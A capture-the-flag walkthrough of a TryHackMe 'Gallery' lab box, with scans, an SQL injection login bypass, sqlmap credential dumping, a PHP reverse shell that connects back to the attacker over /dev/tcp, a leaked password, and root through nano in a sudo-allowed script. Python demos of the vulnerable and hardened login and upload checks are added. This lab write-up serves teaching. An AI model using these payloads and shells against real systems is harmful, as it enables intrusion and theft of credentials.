# Gallery

**Room Link:** <https://tryhackme.com/room/gallery666>

### Initial Scan

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="/files/7IfjAuNw0H8IeJVLA439" alt=""><figcaption></figcaption></figure>

### Scan all ports

A full-range scan turned up no ports beyond 80 and 8080, which were already visible in the initial scan.

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

### TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="/files/DY5vySFG4jEMx8C0YbmQ" alt=""><figcaption></figcaption></figure>

### TCP/8080 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM:8080 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt --wildcard
```

### TCP/80 - HTTP

<figure><img src="/files/6c8JPsNSlMEEhxGZbzIY" alt=""><figcaption></figcaption></figure>

## SQL Injection

The login form is vulnerable to SQL injection through the username field. A tautology payload that comments out the rest of the query bypasses authentication regardless of the password:

```
Username: 1' or '1'='1'-- -
Password: anything
```

<figure><img src="/files/s8u9BCYNuk0blFEmwwOG" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/51ljBNqC3HCbtJFFP1re" alt=""><figcaption></figcaption></figure>
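To show exactly why the payload above logs in without a password, here is an added example (not code from the walkthrough or from the gallery application) that rebuilds the vulnerable pattern against a constructed in-memory SQLite table. The schema, the seeded `admin` account, its password and the MD5 storage format are all assumptions; the payload string is the one used on the page.

```python
import hashlib
import sqlite3

# Constructed stand-in for gallery_db.users: the real schema, hash
# format and stored credentials are not known from the walkthrough.
SCHEMA = """
CREATE TABLE users (
    id       INTEGER PRIMARY KEY,
    username TEXT NOT NULL,
    password TEXT NOT NULL
);
"""
# Hypothetical seeded account; password stored as an MD5 hex digest (assumption).
SEED_USER = "admin"
SEED_PASSWORD = "hypothetical-admin-password"

# The exact payload typed into the login form in the walkthrough.
PAYLOAD = "1' or '1'='1'-- -"


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def open_db() -> sqlite3.Connection:
    """In-memory database holding the single seeded account."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        (SEED_USER, md5_hex(SEED_PASSWORD)),
    )
    return con


def login_vulnerable(con, username: str, password: str):
    """Login check built by string concatenation (the bug the bypass relies on).
    Returns the matched username, or None when no row matches."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{md5_hex(password)}'"
    )
    # With PAYLOAD the statement becomes:
    #   ... WHERE username = '1' or '1'='1'-- -' AND password = '<hash>'
    # The tautology matches every row and the -- comment drops the password check.
    row = con.execute(query).fetchone()
    return row[0] if row else None


def login_safe(con, username: str, password: str):
    """Same check with bound parameters: the payload is compared as a literal
    username and never reaches the SQL parser as syntax."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, md5_hex(password)),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    con = open_db()
    print("vulnerable login with payload ->", login_vulnerable(con, PAYLOAD, "anything"))
    print("parameterised login with payload ->", login_safe(con, PAYLOAD, "anything"))
```

The trailing `-` after `--` in the payload matters on MySQL, which only treats `--` as a comment when it is followed by whitespace; SQLite, used here for a self-contained demo, accepts a bare `--` as well, so the same payload works in both.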

Save the captured login POST request to a file (`request.req`) and let sqlmap enumerate the databases; it found two:

**Kali**

```
sudo sqlmap -r request.req --dbs
```

<figure><img src="/files/XfxpLvzmpq0DYg4aGrLN" alt=""><figcaption></figcaption></figure>

List the tables in `gallery_db`. Note that `-D` selects the database; `--current-db` takes no argument and only prints the name of the database in use, so the original `--current-db gallery_db` form does not do what was intended.

**Kali**

```
sudo sqlmap -r request.req -D gallery_db --tables
```

<figure><img src="/files/pJYR2NCGj1EKptznuOnd" alt=""><figcaption></figcaption></figure>

List the columns of the `users` table:

**Kali**

```
sudo sqlmap -r request.req -D gallery_db -T users --columns
```

<figure><img src="/files/XpYNMDfVXNatLrxItxsu" alt=""><figcaption></figcaption></figure>

Dump the `username` and `password` columns. The password is stored as a hash that I could not crack:

**Kali**

```
sudo sqlmap -r request.req -D gallery_db -T users -C username,password --dump
```

<figure><img src="/files/85ce6jhttrpmEPbNckJS" alt=""><figcaption></figcaption></figure>

## Initial Shell

The gallery's image upload does not verify that the submitted file is actually an image, so a PHP reverse shell can be uploaded in place of a picture and triggered by requesting it from the web server. Start a listener first:

**Kali**

```
nc -lvnp 443
```

**revshell.php code**

```
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>
```

<figure><img src="/files/uCaqforJbyjxp0wTFP4A" alt=""><figcaption></figcaption></figure>
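The walkthrough does not show what check, if any, the gallery applies to uploads, only that a `.php` file was accepted. As an added example (not the application's code, and not from the page), the following constructed handler puts the weak check that would let `revshell.php` through next to a hardened one; the signature table, the sample files and the `stored_name` helper are all assumptions for illustration.

```python
import os
import secrets

# Constructed stand-in for the gallery's image upload handler; the real
# application's checks (if any) are not shown in the walkthrough.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def accept_weak(filename: str, content_type: str, data: bytes) -> bool:
    """Trusts the client-supplied Content-Type header only. A .php file
    sent with 'image/jpeg' is accepted, which is all an attacker needs to
    land a web shell on disk."""
    return content_type.startswith("image/")


def accept_hardened(filename: str, content_type: str, data: bytes) -> bool:
    """Ignores client headers: allowlist on the *last* extension, plus a
    magic-byte check that the body really is that image type."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False
    return any(data.startswith(sig) for sig in MAGIC[ext])


def stored_name(filename: str) -> str:
    """Server-chosen on-disk name: random stem plus the vetted extension,
    so the uploader controls neither the basename nor a second extension."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    return secrets.token_hex(8) + ext


# Constructed sample bodies.
PHP_SHELL = b"<?php exec('/bin/bash -c ...'); ?>"
PNG_FILE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name, ctype, body in [
        ("revshell.php", "image/jpeg", PHP_SHELL),
        ("shell.php.jpg", "image/jpeg", PHP_SHELL),
        ("photo.png", "application/octet-stream", PNG_FILE),
    ]:
        print(f"{name:14} weak={accept_weak(name, ctype, body)!s:5} "
              f"hardened={accept_hardened(name, ctype, body)}")
```

The magic-byte check stops a plain PHP file but not a JPEG/PHP polyglot, so on its own it is not enough: the upload directory should also be served without script execution (or sit outside the web root), which is the control that makes an uploaded `.php` harmless even when validation is bypassed.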

Upgrade the shell to a full TTY (tab completion, job control, and the ability to run an editor later):

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
# press Ctrl+Z to background the shell, then on the Kali side:
stty raw -echo; fg
```

<figure><img src="/files/NYB1Q11giyUYNh2w4IHM" alt=""><figcaption></figcaption></figure>

Enumerating the box from the reverse shell turned up a list of candidate passwords for mike in a file called `accounts`, and another password in a shell history file. One of them works for `su`:

<figure><img src="/files/zWq54IwupGvnnfIEsA4o" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/JXQLLvj6viv6E4vGCCNG" alt=""><figcaption></figcaption></figure>

**Victim**

```
su mike
Password: b3stpassw0rdbr0xx
```

<figure><img src="/files/bFkZ2nfnUEMZoO1Hb0Zx" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

**Exploit:** <https://gtfobins.github.io/gtfobins/nano/>

`sudo -l` shows that mike can run `/bin/bash /opt/rootkit.sh` as root with NOPASSWD. The script presents a menu of options, one of which opens nano; since nano then runs as root, the GTFOBins technique of executing a shell from inside the editor yields a root shell. nano would not open in the reverse shell until TERM was set to `xterm`.

**Victim**

```
sudo -l
export TERM="xterm"
```

<figure><img src="/files/Rzi16ne8oCwlEsy2ZOlE" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/wgaXt9FRCeBIWjgMaHNk" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo /bin/bash /opt/rootkit.sh
# choose the menu option that opens nano, then inside nano:
^R^X
# Ctrl+R then Ctrl+X opens nano's "command to execute" prompt; this spawns a root sh
reset; sh 1>&0 2>&0
```

<figure><img src="/files/196fI9JeFy382yHKTkSI" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/mz5p96ZblFHErqvW6WEj" alt=""><figcaption></figcaption></figure>

